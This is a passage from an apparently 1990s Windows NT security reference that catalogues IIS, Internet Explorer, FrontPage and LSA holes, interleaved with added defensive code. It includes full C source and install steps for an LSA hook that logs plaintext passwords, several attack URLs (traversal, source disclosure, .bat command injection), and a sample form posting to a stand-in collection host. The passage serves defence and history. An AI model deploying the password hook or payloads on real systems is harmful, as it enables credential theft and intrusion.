      After isolating the bug and replicating it we concluded the best way to address the issue was to create new versions of the FrontPage 97 Server Extensions. These Server Extensions are being made immediately available at no charge to all of our users via download from the FrontPage Web site at
      http://www.microsoft.com/frontpage/softlib/current.htm. In addition, we are in the process of proactively sending a set of the updated FrontPage 97 Server Extensions to all Internet Service Providers we know of that are currently using the FrontPage Server Extensions, and we will also include them in the Windows NT Server Service Pack 3.
      This issue came to our attention within the last two weeks from a Microsoft employee creating a Web site with FrontPage. Since then we have been confirming and replicating the error to ensure that it was not an isolated incident. As far as we know, this issue has affected no one outside of Microsoft.
      This bug affects Web sites created with FrontPage 1.1 for Windows and FrontPage 97 with Bonus Pack for Windows that are hosted on Web servers with any version of the FrontPage Server Extensions installed. However, it only affects those sites that contain the WebBot components described above.
      Any web server with the FrontPage 97 or 1.1 Server Extensions installed and active FrontPage webs with the WebBots specified above are potentially at risk. If the server has server-side include capability enabled then the potential exposure is higher. However, server-side includes are a Web server feature that should be carefully evaluated by any Internet server owner regardless of whether the FrontPage Server Extensions are installed.
      This issue is most likely to be a problem for Internet Service Providers who are hosting webs on the Internet with the FrontPage Server Extensions. However, FrontPage 97 automatically installs a web server onto the workstation in order to store Web sites on the workstation for local authoring and staging. Consequently each workstation with FrontPage 97 should be upgraded with the new version of the FrontPage 97 Server Extensions for maximum security. If your workstation does not have a full-time connection to the Internet and you connect occasionally through a modem then the risk of exposure is low but still present, and Microsoft recommends that you install the new Server Extensions.
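      Added example, not part of Microsoft's notice or the MH DeskReference: the general fix behind the updated Server Extensions, HTML-encoding every submitted field before it is appended to the results page, so that any tags a visitor types are displayed as text instead of being rendered as a live form. The submission and the function names below are constructed for the demo and do not reflect how the FrontPage extensions themselves are built.

```powershell
# Added example (not from Microsoft): encode submitted fields before storing them in a
# results page, and check that no markup survived. Input constructed for the demo.
function ConvertTo-SafeResultsEntry {
    param([Parameter(Mandatory)][hashtable]$Fields)
    $rows = foreach ($name in ($Fields.Keys | Sort-Object)) {
        # Encode both the field name and the value; neither comes from a trusted source.
        $label = [System.Net.WebUtility]::HtmlEncode([string]$name)
        $value = [System.Net.WebUtility]::HtmlEncode([string]$Fields[$name])
        "  <tr><td>$label</td><td>$value</td></tr>"
    }
    "<table>`n$($rows -join "`n")`n</table>"
}

function Test-EntryForMarkup {
    param([Parameter(Mandatory)][string]$Html)
    # Any angle bracket left outside the table skeleton we emit means a tag slipped through.
    ($Html -replace '</?(table|tr|td)>', '') -match '[<>]'
}

# Constructed submission: the comment field carries exactly the kind of form the notice describes.
$submission = @{
    Name    = 'visitor'
    Comment = '<form action="http://example.invalid/collect" method="post"><input name="x"></form>'
}

$entry = ConvertTo-SafeResultsEntry -Fields $submission
$entry                              # the form appears as literal text in the table cell
Test-EntryForMarkup -Html $entry    # reports whether any tag survived encoding
```

      The check is deliberately strict about the one skeleton the page emits; if the results page is allowed to contain other tags of its own, extend the whitelist in Test-EntryForMarkup rather than loosening the encoding, because encoding at the point of insertion is what closes the hole.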

      [13.2.2] IE and NTLM Authentication
      --From ntsecurity.net

      A new problem discovered in MS Internet Explorer shows that NT transparently negotiates an authentication attempt with a remote Web server any time that remote server requests an NTLM authentication process. During that process, Internet Explorer will transmit your user name, password, NT domain or workgroup name, and hostname.
      Take note here that during this negotiation process, two versions of the user password are transmitted. One is the full length password and the other represents the first 14 characters of the password, transformed into upper case letters. This fact alone is a GREAT argument for longer passwords - longer than 14 chars, that is.
      IE clients cannot detect whether or not this negotiation process is taking place, which makes it incredibly difficult to anticipate. Furthermore, IE can't determine what server it's talking to -- that is to say, it doesn't know if the server is a valid system to negotiate with -- which means it could be a rogue system. A server could preplan an attack by precomputing a giant database of potential passwords, which can be used for comparison.
      This is NOT an SMB issue, this is an NTLM issue.
      EXAMPLE
      The example is on the page where this was first announced.
      SOLUTION
      You can protect yourself right now by stopping the NTLM SSP service, and disabling it. You may do this using Control Panel | Services, but keep in mind this may adversely affect the operation of the NT system - we take no responsibility.
      Microsoft knows about this problem, and is looking into it as of March 14, 1997. Watch this page for more info.

      [13.2.3] Run Local Commands with IE
      --From ntsecurity.net

      An icon can be embedded within a web page, which when double-clicked, may run a remote application without warning. This is NOT the same bug as the ".LNK and .URL" problem discovered recently.
      According to the author, "this bug only affects Internet Explorer 3.0 users (version 4.70.1215). The problem is significantly more serious if the user is on a platform with CIFS (Windows NT 4.0 with Service Pack 1 or later installed). If this is the case, the location of the malicious executable code to be run on the victim's machine could be anywhere on the Internet. If this is not the case, the location of the machine containing the code is restricted to within the scope of Windows name resolution. For example, the host must be either on the same subnet, listed in the victim's LMHOSTS file, or listed on the victim's WINS server."
      Internet Explorer enables a user to utilize a URL describing a remote directory. When clicked, the desktop moves to a Windows Explorer window -- but it's inside of Internet Explorer. If this URL is used as the basis for an <IFRAME> tag, an embedded frame can be created with what is essentially a Windows Explorer window inside. If this window is made small enough, it appears to be some sort of button, which when clicked runs a remote program. CIFS allows a machine to use the IP or hostname provided in the URL as a way of contacting the remote host containing the executable.


      [13.2.4] IE can launch remote apps
      --From ntsecurity.net

      Microsoft Internet Explorer v3.01 has a serious bug which allows web page writers to use ".LNK" and ".URL" files to run programs on a remote computer. This bug is particularly damaging because it uses NO ActiveX, and works even when Internet Explorer is set to its highest security level. It was tested on Microsoft Internet Explorer Version 3.0 (4.70.1155) running Windows 95. Microsoft says that users running Internet Explorer 3.0 and 3.01 for Windows 95 and Windows NT are affected. It does not affect users of Internet Explorer 3.0 / 3.0a for Windows 3.1 or Internet Explorer for Macintosh 2.1 / 3.0 / 3.0a.
      .URLs work in both Windows 95 and Windows NT 4.0 -- .LNK's only work in Windows 95 -- .URL files present a possibly greater danger because they can be easily created by server side scripts to meet the specific settings of a user's system. We will provide .URL files for execution in the next day or so on this page.
      The "shortcuts" can be set to be minimized during execution which means that users may not even be aware that a program has been started. Microsoft's implementation of shortcuts becomes a serious concern if a webpage can tell Internet Explorer to refresh to an executable. Or worse, client side scripts (Java, JavaScript, or VBScript) can use the Explorer object to transfer a BATCH file to the target machine and then META REFRESH to that BATCH file to execute the rogue command in that file.
      The META REFRESH tag can be used to execute multiple commands in sequence. This demo copies a .BAT file into your Internet Explorer cache and then runs the .BAT file. This .BAT will create a new key in your registry called "HKEY_CURRENT_USER/Software/Cybersnot". It will then open your AUTOEXEC.BAT and CONFIG.SYS in notepad. Finally, it will open REGEDIT so that you can view the key it creates. According to its author, the demo below does not destroy anything and should not cause any problems on your system. HOWEVER, by downloading it, you assume complete liability for what it may do to your system.

      [13.2.5] Password Grabbing Trojans
      From Jeremy Allison

      I am posting this to both the Samba list and the nt-security list as I believe this information will be of interest to both groups. This message is somewhat long and contains code fragments so my apologies if this is of no interest to you (just hit delete :-). Over several years helping to write Samba and dealing with UNIX and NT integration problems one of the most common requests I have seen is some way to get a UNIX box (maybe running Samba) to act as an NT domain controller, or for some way to unify the password databases between UNIX boxes and NT Domains. The first problem is not solvable due to the amount of Microsoft proprietary information they would have to reveal, and MS are not willing to make that available. The second problem, however, is more tractable. It seems in NT4.x Microsoft have finally revealed enough information to make synchronisation between UNIX and NT password databases possible.
      Sync'ing from a UNIX box to an NT box was always possible, as the APIs to change an NT password have always been available in the old Lanman API set; the difficulty was sync'ing NT password changes to a UNIX box, as the password change APIs always seemed to go into a 'black box' to which no external access was available. It had to be possible, however, as NT Domains are perfectly capable of synchronising with Netware LANs. As the password hash mechanisms in NT and Netware are different, the Netware password update mechanism had to be able to get at the plaintext password at the update time, before it got hashed and placed in the NT SAM. This mechanism is now available to other libraries on NT 4.x.
      On NT 4.x there is a Key
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
      and one of the defined name/value pairs is "Notification Packages", which is a Multi_string value which as shipped has a value of FPNWCLNT. This is obviously the name of a DLL (as I found it as FPNWCLNT.DLL in %SYSTEMROOT%\SYSTEM32) and logic would dictate that this was the place that the Netware password updates were done. The latest Microsoft SDK held the missing part of the puzzle, the necessary APIs that need to be in such a DLL in order for it to get password change notification. So here below is a very simple DLL that will receive plaintext password change notifications from the NT LSA code. The sample code just logs all password change notifications to a file called C:\TEMP\PWDCHANGE.OUT, but it illustrates the technique. To test it, compile the C code and .DEF file into a DLL called pwdchange.dll, copy it to %SYSTEMROOT%\SYSTEM32, and update the value
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
      to read
      FPNWCLNT
      PWDCHANGE
      (NB. The newline between the two is *important*) and then reboot the machine. Tests show that all password changes are now funnelled through this DLL with the following information: Username, Plaintext password, RID (relative domain id). More interesting is that on creation of a new user this DLL is also called; this could be used to do centralized account management by creating a new UNIX user on the fly as a new NT user is created. Such a library would be installed on the Primary domain controller for an NT domain, and will then allow all users' passwords to be propagated to non-NT systems as they are changed. The useful thing about this method is that it gets called on *all* forms of password update, from using CTRL-ALT-DEL to update your password, using USERMGR to change a password, or even by using the net user <username> <password> command from the command prompt.
      My own uses for this will be to keep an smbpasswd file up to date for the use by Samba, but a proposed mechanism to keep a UNIX password database in synch would be as follows:
      1). Keep the notify DLL simple, as it is called in the context of an NT security system - we don't want complexity here. Just write the change information down a named pipe from the DLL.
      2). Create a service, that creates the read end of the above named pipe. This service is configured with the following information, held in the registry.
      a). The name of the UNIX machine and TCP port number of a process on it to communicate with.
      b). A 'secret' DES key (secret in quotes as anyone with Administrator access could read it) which is used to encrypt the change notifications going across the net. This service would just read password change notifications, encrypt the data and ship it to a UNIX machine where it could be processed. This service can get as complex as we like, with queueing, retry, handshaking etc.
      3). Create a UNIX daemon, running as root, listening on the TCP port named above for password change data. This daemon also needs access to the 'secret' DES key to decrypt the data (probably in a root-owned and read-only by root file).
      This daemon could then be configured to keep whatever databases residing on the UNIX side in sync are required. Suggestions are the UNIX password database, the Samba database, a Kerberos password database, Oracle, Sybase.... be my guest :-).
      If this above daemon is written so that new change notification modules can be plugged in to it (like the PAM spec as an example) it would be flexible enough for all the above. Of course this will make any security expert shudder, as compromising the DES key compromises all new password changes, but that's the price we pay for simplicity (Bruce Schneier(sp?) would definitely not approve :-). Anyway, enough with the pontificating, here's the code :-). (Code was written with Microsoft Visual C++ 4.x, not tested on other compilers). As always, this code has no warranty, and using it may cause your system to self destruct in 5 seconds .. .etc, etc, etc.... (hope that's enough legalese to protect me :-)
      Some comments by: Mark Joseph Edwards
      Although some people think that this exploit only works on a PDC, this is NOT so. It works just fine on NT systems installed just as a server (non-domain controller), and it also works just fine on NT Workstation. This DOESN'T work on a Backup Domain Controller, but it DOES work on a Primary Domain Controller. Also, take note that NT 4.0 and Service Pack 2 (or greater) are required for this to work on any variety of NT installation. If you want more information on this hook, see Microsoft's Knowledge Base article # Q151082. You may also want to take note right here and now that the MSGINA.DLL, which is the default "Graphical Identification and Authorization" provider for the local console logon, could also be overwritten with a trojan .DLL. Once this happens, you're toast. Ouch!
      Here's Jeremy's useful (non-trojan) code:
      -----------------cut here-------pwdchange.c-----------------------------
      #include <windows.h>
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>

      /* Layout of the counted UNICODE_STRING the LSA passes in: len and
         maxlen are byte counts and buff is not NUL-terminated. */
      struct UNI_STRING {
          USHORT len;
          USHORT maxlen;
          WCHAR *buff;
      };

      static HANDLE fh;

      /* Called once by the LSA when the notification package is loaded. */
      BOOLEAN __stdcall InitializeChangeNotify(void)
      {
          DWORD wrote;
          fh = CreateFile("C:\\temp\\pwdchange.out",
                          GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE,
                          0,
                          CREATE_ALWAYS,
                          FILE_ATTRIBUTE_NORMAL | FILE_FLAG_WRITE_THROUGH,
                          0);
          if (fh == INVALID_HANDLE_VALUE)
              return FALSE;
          WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);

          return TRUE;
      }

      /* Copy a counted UNICODE_STRING into a NUL-terminated ANSI buffer.
         The length is clamped to the buffers: the original version copied
         user->len bytes into a fixed 200-WCHAR array with no check. */
      static void uni_to_ansi(const struct UNI_STRING *s, char *dst, size_t dstlen)
      {
          WCHAR wbuf[200];
          size_t len = s->len / sizeof(WCHAR);

          if (len > 199)
              len = 199;
          memcpy(wbuf, s->buff, len * sizeof(WCHAR));
          wbuf[len] = 0;
          wcstombs(dst, wbuf, dstlen - 1);
          dst[dstlen - 1] = 0;
      }

      /* Called by the LSA on every password set or change, with the plaintext. */
      LONG __stdcall PasswordChangeNotify(struct UNI_STRING *user,
                                          ULONG rid,
                                          struct UNI_STRING *passwd)
      {
          DWORD wrote;
          char buf[512];
          char buf1[200];

          uni_to_ansi(user, buf1, sizeof(buf1));
          sprintf(buf, "User = %s : ", buf1);
          WriteFile(fh, buf, strlen(buf), &wrote, 0);

          uni_to_ansi(passwd, buf1, sizeof(buf1));
          sprintf(buf, "Password = %s : ", buf1);
          WriteFile(fh, buf, strlen(buf), &wrote, 0);

          sprintf(buf, "RID = %lx\n", rid);
          WriteFile(fh, buf, strlen(buf), &wrote, 0);

          return 0L;
      }
      -----------------------end of pwdchange.c------------------------------------
      ---------cut here-pwdchange.def----------------------------------------------
      EXPORTS

      InitializeChangeNotify=_InitializeChangeNotify@0
      PasswordChangeNotify=_PasswordChangeNotify@12

      --------------------end pwdchange.def-----------------------------------------
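      The defender's counterpart to the hook Jeremy and Mark describe is to audit what is registered under that key, since every DLL listed there receives plaintext passwords. The following Python is an added example, not part of the original post or of Samba: it parses the Lsa key as printed by a modern `reg query` (REG_MULTI_SZ entries separated by a literal `\0`; an assumption about the tool's output format), compares the Notification Packages entries with a baseline allow-list, and reports anything extra. The sample output and the baseline (FPNWCLNT, the value the text says ships by default) are constructed for the example.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample of `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa`
# output on a box where the PWDCHANGE package from the text has been added.
# reg query prints REG_MULTI_SZ entries separated by a literal backslash-zero.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Authentication Packages    REG_MULTI_SZ    msv1_0
    Notification Packages    REG_MULTI_SZ    FPNWCLNT\0PWDCHANGE
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0
"""

# Baseline allow-list: the text says the value ships with FPNWCLNT only.
# Anything else is a DLL the LSA will hand every password change to.
BASELINE_PACKAGES = {"FPNWCLNT"}

# name, two or more spaces, REG_type, two or more spaces, data
_LINE = re.compile(r"^\s*(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def parse_reg_query(text: str) -> Dict[str, List[str]]:
    """Return {value_name: [entries]} from reg query output.

    REG_MULTI_SZ data is split on the two-character sequence backslash-zero;
    every other value type is kept as a single-element list.
    """
    values: Dict[str, List[str]] = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        data = m.group("data").strip()
        if m.group("type") == "REG_MULTI_SZ":
            entries = [e for e in data.split("\\0") if e]
        else:
            entries = [data]
        values[m.group("name").strip()] = entries
    return values


def unexpected_notification_packages(text: str,
                                     baseline: Iterable[str] = BASELINE_PACKAGES) -> List[str]:
    """Entries under Notification Packages that are not in the baseline.

    Comparison is case-insensitive: the value holds DLL base names and the
    loader does not care about case.
    """
    values = parse_reg_query(text)
    allowed = {b.lower() for b in baseline}
    return [p for p in values.get("Notification Packages", [])
            if p.lower() not in allowed]


if __name__ == "__main__":
    for pkg in unexpected_notification_packages(SAMPLE_REG_QUERY):
        # Each hit is a DLL in %SYSTEMROOT%\SYSTEM32 that sees plaintext passwords.
        print(f"unexpected notification package: {pkg}.dll")
```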

      [13.2.6] Reverting an ISAPI Script

      ISAPI scripts run under the IUSR_MACHINENAME account under IIS, and thus inherit the security permissions of this account. However, if the ISAPI program contains a simple call labelled RevertToSelf(), you have a big hole. Once that program line is executed, the ISAPI program reverts its authority to the all-powerful SYSTEM account, at which point the program can do just about anything, including successfully execute system() calls.
      Try it yourself - this DLL runs on Intel based IIS machines. Drop it in your scripts directory, and call it without any parameters using your Web browser (i.e.
      http://www.yoursite.com/scripts/revert.dll) It creates a directory called C:\IIS-REVERT-TEST with no trouble at all :( I tested this on an NTFS partition with no normal user permissions on the root directory.
      Additionally, Laxmikant Gunda was kind enough to report to us that there is yet another way to perform this same exploit. Laxmikant offers the following:
      "An ISAPI DLL runs under the security context of the IUSR_MACHINENAME account under IIS, and thus inherits the security permissions of that account. However, if the ISAPI DLL creates a process using a call to CreateProcess( ), the process created inherits the security context of the powerful LocalSystem account rather than IUSR_MACHINENAME, thus creating a hole. Thus, any system process can be fired by the ISAPI DLL using this technique.
      This can be tried using a generic ISAPI DLL & inserting code for CreateProcess( ) with a process name present in the system.
      This behaviour is documented in MSDN library on Impersonation : "When a thread is impersonating a user, most actions by the thread are done in the security context of the thread's impersonation token rather than the primary token of the process that owns the thread. For example, an individual thread of a server process can impersonate a client to verify that the client is allowed to access a securable object. However, some actions are always done using the security context of the process. For example, if an impersonating thread calls the CreateProcess function, the new process inherits the primary token of the process rather than the impersonation token of the calling thread. Similarly, the system always uses the primary token of the process to validate actions requiring the SE_TCB_NAME privilege."

      [13.2.7] Rollback.exe

      The Windows NT 4.0 Server and Workstation compact discs include a utility called Rollback.exe. Rollback.exe was designed to help computer manufacturers preinstall Windows NT 4.0, and allow end-users to do the final configuration according to the desired role of the computer. Running this utility will remove all registry settings on a system and bring it back to the end of the Character Based Setup portion of the Setup program, effectively undoing everything configured by the GUI portion of Windows NT Setup.
      WARNING: Do not run this file on a production system! There is no way to recover information erased by running this utility, so anything stored in the registry will be lost. This includes user account information, protocol bindings, application settings, user preferences, etc.
      MORE INFORMATION
      If you run Rollback.exe on a production system there is no warning that Rollback.exe removes all system registry entries. Therefore, after you run Rollback.exe there is no system to rescue or to restore, as the registry and the Setup.log file no longer exist.
      The only fix to this problem is to restore the entire system from a current tape backup. The Emergency Repair Disk does not restore the system, as it requires the Setup.log and specific registry components to be present.
      Rollback.exe is on the Windows NT compact discs in the following directory:
      support\deptools\<system>\

      [13.2.8] Replacing System .dll's

      System DLLs are called by applications and the registry, and can be replaced with trojaned/virused versions. %systemroot% and %systemroot%\system32 directories have default permissions of 'Everyone' (includes guest) set to 'Change'. This allows DLLs not in use to be replaced. DLLs in use are locked.
      DLLs are run by programs at various levels during normal operation. A DLL for example can be run with SYSTEM privileges by a service while a user with normal privileges is logged on.
      This is also true for the MSGINA.DLL, which is the default "Graphical Identification and Authorization" provider for the local console logon, which if replaced, could seriously compromise your entire enterprise.

      [13.2.9] Renaming Executables

      Executables renamed with an arbitrary extension such as .xxx still run as executables from the command line. Executables can be renamed with any extension and run from the command prompt or a batch file, which subverts filtering and download controls that key on the filename extension.
      Also, executables without a filename extension can be started from the command prompt or a batch file, as NT will try to run the file as .COM, .EXE, .CMD, or .BAT in that order.
      This leaves room for a potential trojan to be introduced into the system.
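      Because the extension says nothing about what a file is, a filter has to look at the content. The following Python is an added example, not part of the original text: it recognises a Win32 executable from its header (the MZ signature and the PE\0\0 signature at the offset stored at 0x3C) and batch text from its first line, then reports when the name disagrees with the content. The sample files are constructed byte strings; note the caveat that .COM files carry no magic number at all, so header inspection cannot catch everything NT will run.

```python
import struct
from typing import Dict

MZ = b"MZ"
PE_SIG = b"PE\0\0"
BATCH_KEYWORDS = ("@echo", "rem ", "echo ", "set ", "call ", "goto ")


def looks_like_pe(data: bytes) -> bool:
    """True if the bytes carry a DOS MZ header whose e_lfanew (at 0x3C) points
    at a PE signature. Only the header layout is checked, so a renamed or
    extensionless .EXE is recognised regardless of its name."""
    if len(data) < 0x40 or data[:2] != MZ:
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + len(PE_SIG) > len(data):
        return False
    return data[e_lfanew:e_lfanew + len(PE_SIG)] == PE_SIG


def looks_like_batch(data: bytes) -> bool:
    """Heuristic for .BAT/.CMD content, which has no magic number: ASCII text
    whose first non-blank line starts with a common batch keyword."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    for line in text.splitlines():
        if line.strip():
            return line.strip().lower().startswith(BATCH_KEYWORDS)
    return False


def classify_upload(name: str, data: bytes) -> str:
    """Label a file by its content and flag an extension that disagrees."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if looks_like_pe(data):
        return "pe-executable" + ("" if ext in ("exe", "dll") else " (extension mismatch)")
    if looks_like_batch(data):
        return "batch-script" + ("" if ext in ("bat", "cmd") else " (extension mismatch)")
    return "other"


def fake_pe() -> bytes:
    """Constructed minimal header: MZ, e_lfanew = 0x80, PE signature at 0x80."""
    hdr = bytearray(0x84)
    hdr[:2] = MZ
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x80:0x84] = PE_SIG
    return bytes(hdr)


# Constructed samples: a renamed executable, an extensionless one, batch text
# under an odd extension, a plain document and a correctly named executable.
SAMPLE_FILES: Dict[str, bytes] = {
    "readme.txt": fake_pe(),
    "tool": fake_pe(),
    "notes.xxx": b"@echo off\r\nrem harmless\r\n",
    "report.doc": b"Quarterly figures\r\n",
    "setup.exe": fake_pe(),
}


if __name__ == "__main__":
    for fname, blob in SAMPLE_FILES.items():
        print(f"{fname:12s} {classify_upload(fname, blob)}")
```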

      [13.3.0] Viewing ASP Scripts

      DESCRIPTION
      A serious security hole was found in Microsoft's Active Server Pages (ASP) by Juan T. Llibre <j.llibre@codetel.net.do>. This hole allows Web clients to download unprocessed ASP files potentially exposing user ids and passwords. ASP files are the common file type used by Microsoft's IIS and Active Server to perform server-side processing. Microsoft confirms that .HTX and .IDC files are also vulnerable.
      HOW IT WORKS
      To download an unprocessed ASP file, simply append a period to the ASP URL. For example:
      http://www.domain1.com/default.asp
      becomes
      http://www.domain1.com/default.asp.
      With the period appended, Internet Information Server (IIS) will send the unprocessed ASP file to the Web client, where the source of the file can be examined at will. If the source includes any security parameter designed to allow access to other system processes, such as an SQL database, it will be revealed.
      [13.3.1] .BAT and .CMD Attacks

      Sending a command line to the server, such as "http://www.domain.com/scripts/exploit.bat?&commandA+?&commandB", and then clicking the Stop button on the browser will cause the server to execute DOS commands on the server's OS.
      Adding a '+?&time' or '+?&date' to the end of the command, will cause the server to pause for input. Clicking the Stop Button on the browser will interrupt the server making a log entry of the command string executed.

      [13.3.2] IIS /..\.. Problem

      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute a target script.
      By default user 'Guest' or 'IUSR_MACHINENAME' has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

      [13.3.3] Truncated Files

      A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file called "target.bat". If the file "target.bat" already exists, the file will be truncated, erasing any previous contents.
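      Sections 13.3.0 through 13.3.3 all come down to request paths a server should never act on: a trailing period after .asp, a ..\.. component, a > redirection character, and &-separated commands handed to a .bat. The following Python is an added example, not from the original text or from Microsoft: a normaliser plus checker that percent-decodes and folds backslashes the way the file system will, then tags each request with the pattern it matches, run over constructed log-style request lines so a proxy or log review can reject or flag them.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote, urlsplit

# Constructed request lines shaped like the examples in 13.3.0 - 13.3.3.
SAMPLE_REQUESTS = [
    "GET /default.asp HTTP/1.0",
    "GET /default.asp. HTTP/1.0",                               # 13.3.0 trailing period
    "GET /scripts/exploit.bat?&commandA+?&commandB HTTP/1.0",   # 13.3.1 batch commands
    "GET /..\\..\\readme.txt HTTP/1.0",                         # 13.3.2 ..\.. traversal
    "GET /scripts..%5c..%5cscriptname HTTP/1.0",                # 13.3.2, encoded backslash
    "GET /scripts/exploit.bat>PATH\\target.bat HTTP/1.0",       # 13.3.3 redirection
    "GET /images/logo.gif HTTP/1.0",
]

# File types the text names as served in source form when a period is appended.
SCRIPT_EXTENSIONS = (".asp", ".htx", ".idc")


def normalise_path(raw_path: str) -> str:
    """Percent-decode twice (to catch double encoding), fold backslashes to
    slashes and lower-case, so the checks see what the file system will see."""
    decoded = unquote(unquote(raw_path))
    return decoded.replace("\\", "/").lower()


def classify_request(request_line: str) -> List[str]:
    """Return the problem tags for one request line (empty if it looks clean)."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return ["malformed"]
    parts = urlsplit(target)
    path = normalise_path(parts.path)
    query = unquote(parts.query)
    tags: List[str] = []

    # 13.3.0: a trailing period (or space) after a script name makes IIS
    # hand out the source instead of executing it.
    stripped = path.rstrip(". ")
    if stripped != path and stripped.endswith(SCRIPT_EXTENSIONS):
        tags.append("trailing-period-source-disclosure")

    # 13.3.2: any parent-directory component left after normalisation
    # escapes the content root.
    if any(seg == ".." for seg in path.split("/")):
        tags.append("parent-traversal")

    # 13.3.3: shell redirection characters in the path create or truncate files.
    if ">" in path or "<" in path:
        tags.append("shell-redirection")

    # 13.3.1: a .bat/.cmd target whose query string carries &-separated commands.
    if stripped.endswith((".bat", ".cmd")) and re.search(r"&\s*\w", query):
        tags.append("batch-command-injection")
    return tags


def flagged_requests(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(request line, tags) for every line that tripped at least one check."""
    flagged = []
    for line in lines:
        tags = classify_request(line)
        if tags:
            flagged.append((line, tags))
    return flagged


if __name__ == "__main__":
    for line, tags in flagged_requests(SAMPLE_REQUESTS):
        print(f"{', '.join(tags):36s} {line}")
```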
      [13.3.4] SNA Holes
      --From ntsecurity.net

      When you attach to shared folders on an AS/400 using SNA Server, where the security level is set to 30 or higher, and security has been set on the folders to allow limited access, after the first user connects to a shared folder, all subsequent users acquire the first user's access permissions to shared folders.
      This problem occurs when SNA Server is sharing a single Local APPC LU when communicating to an AS/400. The security for shared folders on the AS/400 (when security is set to level 30 or higher), is tied to the controller. In this case, the AS/400 views the controller as its Remote LU, or SNA Server's Local APPC LU.
      The transaction program which supports the shared folders function on the AS/400 identifies a user based on the SNA Server Local APPC LU name being used. Therefore, if multiple SNA Server users are sharing the same Local APPC LU for use with shared folders, you are able to view each other's AS/400 folders. Due to the design of the AS/400 shared folders feature, the first shared folder's user to connect over a Local APPC LU determines the AS/400 security rights for the remaining users who connect over the same Local APPC LU.
      For Microsoft's information on this, see their Knowledge Base article:
      http://www.microsoft.com/kb/articles/q138/0/01.htm
      DEFENSE
      Create a separate LU (Local to the SNA Server) for each user and pair each LU with the AS/400's LU. Then each user accesses a separate controller and has appropriate access to shared folders. In addition, each shared folder's client application must be configured with a unique Local APPC LU alias. If you prefer to leave this field empty, the SNA Server administrator can assign a default Local APPC LU alias for each user using SNA Admin (2.x) or SNA Server Manager (3.x) configured on the user record.

      [13.3.5] SYN Flooding

      On your computer running the TCP/IP protocol and connected to the Internet, some or all network services are rendered unavailable and error messages such as the following appear on the network client screen:
      The connection has been reset by the remote host.
      This symptom of all network services being rendered unavailable may also occur on a computer running an operating system other than Windows NT, for example, Unix.
      Your computer has become the target of a malicious attack known as TCP/IP "SYN Flooding" or "SYN Attacks."
      "Computer hackers" can target an entire machine, or a specific TCP service such as web services. The attack is focused on the TCP protocol used by all computers on the Internet, and is not specific to the Windows NT operating system.
      How SYN Flooding Works
      SYN Flooding works as follows (see also CERT(sm) Advisory CA-96.21 at ftp://info.cert.org/pub/cert_advisories):
      - A TCP connection request (SYN) is sent to the target computer. The source IP address in the packet is "spoofed," or replaced with an address that is not in use on the Internet, or that belongs to another computer. An attacker will send many of these TCP SYNs to tie up as many resources as possible on the target computer.
      - Upon receiving the connection request, the target computer allocates resources to handle and track the new connection, then responds with a "SYN-ACK". In this case, the response is sent to the "spoofed" non-existent IP address.
      - No response is received to the SYN-ACK. A default-configured Windows NT 3.5x or 4.0 computer will retransmit the SYN-ACK 5 times, doubling the time-out value after each retransmission. The initial time-out value is three seconds, so retries are attempted at 3, 6, 12, 24, and 48 seconds. After the last retransmission, 96 seconds are allowed to pass before the computer gives up on receiving a response, and deallocates the resources that were set aside earlier for the connection. The total elapsed time that resources are in use is 189 seconds.
      If you suspect that your computer is the target of a SYN attack, you can type the following command at a command prompt to view connections in the "SYN_RECEIVED" state:
      netstat -n -p tcp
      If a large number of connections are in the SYN_RECEIVED state, it is possible that the system is under attack. A network analyzer can be used to track the problem down further, and it may be necessary to contact your Internet Service Provider for assistance in attempting to trace the source.
      The effect of tying up connection resources varies, depending upon the TCP/IP stack and applications listening on the TCP port. For most stacks, there is a limit on the number of connections that can be in the half-open (SYN_RECEIVED) state. Once the limit is reached for a given TCP port, the target computer responds with a reset to all further connection requests until resources are freed.
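      To put the two pieces of this section to work, the following Python is an added example, not part of the original text: it counts SYN_RECEIVED entries per local port in constructed `netstat -n -p tcp` output, reproduces the retransmission schedule described above (the 3, 6, 12, 24 and 48 second figures are the intervals, so SYN-ACKs go out at 3, 9, 21, 45 and 93 s and the final 96 s wait gives the 189 s total), and converts an observed rate of unanswered SYNs into the number of half-open entries it keeps allocated, which is the figure to compare against the stack's half-open limit when choosing an alert threshold.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample of `netstat -n -p tcp` output on an NT box receiving
# spoofed SYNs against its web port. The SYN_RECEIVED rows are the half-open
# connections the text says to look for.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    192.0.2.10:80          198.51.100.7:1033      ESTABLISHED
  TCP    192.0.2.10:80          203.0.113.4:1100       SYN_RECEIVED
  TCP    192.0.2.10:80          203.0.113.9:2201       SYN_RECEIVED
  TCP    192.0.2.10:80          203.0.113.22:3307      SYN_RECEIVED
  TCP    192.0.2.10:80          203.0.113.31:4418      SYN_RECEIVED
  TCP    192.0.2.10:139         198.51.100.12:1045     ESTABLISHED
  TCP    192.0.2.10:25          203.0.113.77:5510      SYN_RECEIVED
"""

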